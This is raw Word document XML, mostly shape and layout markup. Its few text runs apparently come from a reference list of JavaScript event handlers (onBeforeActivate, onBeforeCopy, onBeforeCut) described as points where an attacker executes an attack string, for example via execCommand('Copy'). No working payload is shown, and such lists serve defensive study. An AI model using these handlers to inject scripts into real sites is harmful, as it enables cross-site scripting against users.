                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 337 155"/>
                              <a:gd name="T7" fmla="*/ 337 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 337 155"/>
                              <a:gd name="T11" fmla="*/ 337 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 316 155"/>
                              <a:gd name="T15" fmla="*/ 316 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 313 155"/>
                              <a:gd name="T19" fmla="*/ 313 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 176 155"/>
                              <a:gd name="T23" fmla="*/ 176 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 155 155"/>
                              <a:gd name="T27" fmla="*/ 155 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 155 155"/>
                              <a:gd name="T31" fmla="*/ 155 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 176 155"/>
                              <a:gd name="T35" fmla="*/ 176 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 316 155"/>
                              <a:gd name="T39" fmla="*/ 316 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 337 155"/>
                              <a:gd name="T43" fmla="*/ 337 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580"/>
                              <a:gd name="T46" fmla="+- 0 337 155"/>
                              <a:gd name="T47" fmla="*/ 33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80" h="183">
                                <a:moveTo>
                                  <a:pt x="155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559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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" name="Text Box 116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5"/>
                            <a:ext cx="158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onBeforeActivate()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6" o:spid="_x0000_s1266" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.75pt;width:79pt;height:9.15pt;z-index:-17646080;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,155" coordsize="158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">
                <v:shape id="Freeform 1168" o:spid="_x0000_s1267" style="position:absolute;left:1930;top:155;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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oX+cAA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86UYLoaSuIi1Cb6Km92l2mgSz&#10;s3F3jPHfu4VCb/N4n7PajK5TA4XYejawmGegiCtvW64NlKfd7BVUFGSLnWcycKcIm/XTZIWF9Tc+&#10;0HCUWqUQjgUaaET6QutYNeQwzn1PnLgfHxxKgqHWNuAthbtOL7Ms1w5bTg0N9vTeUHU+Xp2BsBT/&#10;/dLvZY9f7cegy8upKi/GTJ/H7RsooVH+xX/uT5vmL/Icfr9JJ+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3oX+cAAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m1559,182l21,182r-3,l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,21l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,337;21,337;18,337;0,316;0,313;0,176;21,155;1559,155;1580,176;1580,316;1562,337;1559,337" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1167" o:spid="_x0000_s1268" type="#_x0000_t202" style="position:absolute;left:1930;top:155;width:158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8T8cQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi96cYeUo1uREoLQqE0xkOP0+wk&#10;WczOptlV03/fLQje5vE+Z7MdbScuNHjjWMFinoAgrpw23Cg4lm+zJQgfkDV2jknBL3nY5g+TDWba&#10;XbmgyyE0Ioawz1BBG0KfSemrliz6ueuJI1e7wWKIcGikHvAaw20nn5IklRYNx4YWe3ppqTodzlbB&#10;7ouLV/Pz8f1Z1IUpy1XC7+lJqcfpuFuDCDSGu/jm3us4f5E+w/838QS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PE/H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onBeforeActivate()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element)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757"/>
          <w:tab w:val="left" w:pos="1758"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1757" w:hanging="1470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091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795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1162" name="Group 1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5020" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1163" name="Freeform 1165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1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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" name="Text Box 116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1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onBeforeCopy()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3" o:spid="_x0000_s1269" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:62.6pt;height:9.15pt;z-index:-17645568;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="125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">
                <v:shape id="Freeform 1165" o:spid="_x0000_s1270" style="position:absolute;left:1930;top:166;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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HsTMIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/sfwgh707QKRapRdEGwp8VH72MzttVm&#10;Upus1n+/ERb2Nh/fcxar3jTiQZ2rLSuIxxEI4sLqmksFp+N2NAPhPLLGxjIpeJGD1fJjsMBU2yfv&#10;6XHwpQgh7FJUUHnfplK6oiKDbmxb4sBdbGfQB9iVUnf4DOGmkZMoSqTBmkNDhS19VVTcDj9GwTTp&#10;c7fVl+/8nO1e9cZk8f2aKfU57NdzEJ56/y/+c+90mB8nU3h/E06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sexMwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,348;21,348;18,348;0,327;0,324;0,187;21,166;1231,166;1252,187;1252,327;1234,348;1231,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1164" o:spid="_x0000_s1271" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:125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2NhsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTedGMpoUZXEbFQKBRjPHgcs2Oy&#10;mJ2N2a2m/74rFLzN433OYtXbRtyo88axgukkAUFcOm24UnAoPsbvIHxA1tg4JgW/5GG1HA4WmGl3&#10;55xu+1CJGMI+QwV1CG0mpS9rsugnriWO3Nl1FkOEXSV1h/cYbhv5miSptGg4NtTY0qam8rL/sQrW&#10;R8635vp92uXn3BTFLOGv9KLUy6hfz0EE6sNT/O/+1HH+NH2D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2Nh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onBeforeCopy()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>before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selection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>copied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>clipboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3650"/>
        </w:tabs>
        <w:spacing w:before="75"/>
        <w:ind w:left="46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1424" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2159000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1057275" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1159" name="Group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7275" cy="116205"/>
                          <a:chOff x="3400" y="81"/>
                          <a:chExt cx="1665" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1160" name="Freeform 1162"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3400" y="81"/>
                            <a:ext cx="1665" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5044 3400"/>
                              <a:gd name="T1" fmla="*/ T0 w 1665"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 3422 3400"/>
                              <a:gd name="T5" fmla="*/ T4 w 1665"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 3418 3400"/>
                              <a:gd name="T9" fmla="*/ T8 w 1665"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 3400 3400"/>
                              <a:gd name="T13" fmla="*/ T12 w 1665"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 3400 3400"/>
                              <a:gd name="T17" fmla="*/ T16 w 1665"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 3400 3400"/>
                              <a:gd name="T21" fmla="*/ T20 w 1665"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 3422 3400"/>
                              <a:gd name="T25" fmla="*/ T24 w 1665"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5044 3400"/>
                              <a:gd name="T29" fmla="*/ T28 w 1665"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5065 3400"/>
                              <a:gd name="T33" fmla="*/ T32 w 1665"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5065 3400"/>
                              <a:gd name="T37" fmla="*/ T36 w 1665"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5047 3400"/>
                              <a:gd name="T41" fmla="*/ T40 w 1665"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5044 3400"/>
                              <a:gd name="T45" fmla="*/ T44 w 1665"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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665" h="183">
                                <a:moveTo>
                                  <a:pt x="1644" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="1644" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1647" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164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" name="Text Box 1161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81"/>
                            <a:ext cx="166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1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execCommand("Copy")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0" o:spid="_x0000_s1272" style="position:absolute;left:0;text-align:left;margin-left:170pt;margin-top:4.05pt;width:83.25pt;height:9.15pt;z-index:-17645056;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="3400,81" coordsize="166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">
                <v:shape id="Freeform 1162" o:spid="_x0000_s1273" style="position:absolute;left:3400;top:81;width:1665;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="166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WgHsUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzKFXkQ39iASXaW0tQp6MUrPQ3aa&#10;DWZnQ3ar8d87B8HbDO/Ne98sVr1v1IW6WAc2MBlnoIjLYGuuDJyO69EMVEzIFpvAZOBGEVbLl8EC&#10;cxuufKBLkSolIRxzNOBSanOtY+nIYxyHlli0v9B5TLJ2lbYdXiXcN/o9y6baY83S4LClT0flufj3&#10;BoZ+9/O9nt0KtMPN/vxbuvSV9ca8vfYfc1CJ+vQ0P663VvAnU+GXb2QEv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aAexQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m1644,182l22,182r-4,l,161r,-3l,21,22,,1644,r21,21l1665,161r-18,21l1644,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1644,263;22,263;18,263;0,242;0,239;0,102;22,81;1644,81;1665,102;1665,242;1647,263;1644,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1161" o:spid="_x0000_s1274" type="#_x0000_t202" style="position:absolute;left:3400;top:81;width:166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ouHsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi96SYeQpu6EZEKglAa00OP0+wk&#10;WczOxuyq6b/vFgq9zeN9znoz2V7caPTGsYJ0mYAgrp023Cr4qPaLJxA+IGvsHZOCb/KwKR5ma8y1&#10;u3NJt1NoRQxhn6OCLoQhl9LXHVn0SzcQR65xo8UQ4dhKPeI9htterpIkkxYNx4YOB9p1VJ9PV6tg&#10;+8nlq7m8fb2XTWmq6jnhY3ZW6nE+bV9ABJrCv/jPfdBxfpql8PtNPEE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qLh7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1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execCommand("Copy")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can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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tab/>
        <w:t>function)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:ind w:left="1673" w:hanging="1386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193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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1156" name="Group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6205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1157" name="Freeform 1159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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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8" name="Text Box 115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11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onBeforeCut()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57" o:spid="_x0000_s1275" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:58.35pt;height:9.15pt;z-index:-17644544;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="116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">
                <v:shape id="Freeform 1159" o:spid="_x0000_s1276" style="position:absolute;left:1930;top:154;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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lLZMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H+wdwhnsZsxU2Y90RpnCoCC7qPMBDs2x&#10;LTYnJUnb+PaLIHh3Pr7fs9pE04mRnG8tK5jPMhDEldUt1wqOfz+vSxA+IGvsLJOCC3nYrB8fVphr&#10;O3FJ4yHUIoWwz1FBE0KfS+mrhgz6me2JE3eyzmBI0NVSO5xSuOnkIss+pMGWU0ODPe0aqs6HwSj4&#10;3W1jgfvJ+ViMw9vwcizl5azU81P8/gIRKIa7+OYudJo/f/+E6zfpBL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lLZMMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,336;21,336;18,336;0,315;0,312;0,175;21,154;1146,154;1167,175;1167,315;1149,336;1146,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1158" o:spid="_x0000_s1277" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:116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xNPsYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzJCb7pRqNjoKlIqCIXSmB56nGbH&#10;ZDE7m2ZXTf9951DwNsN789436+3gW3WlPrrABmbTDBRxFazj2sBnuZ8sQcWEbLENTAZ+KcJ28zBa&#10;Y27DjQu6HlOtJIRjjgaalLpc61g15DFOQ0cs2in0HpOsfa1tjzcJ962eZ9lCe3QsDQ129NJQdT5e&#10;vIHdFxev7uf9+6M4Fa4snzN+W5yNeRwPuxWoREO6m/+vD1bwZ0+CK9/ICHr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xNPs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onBeforeCut()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
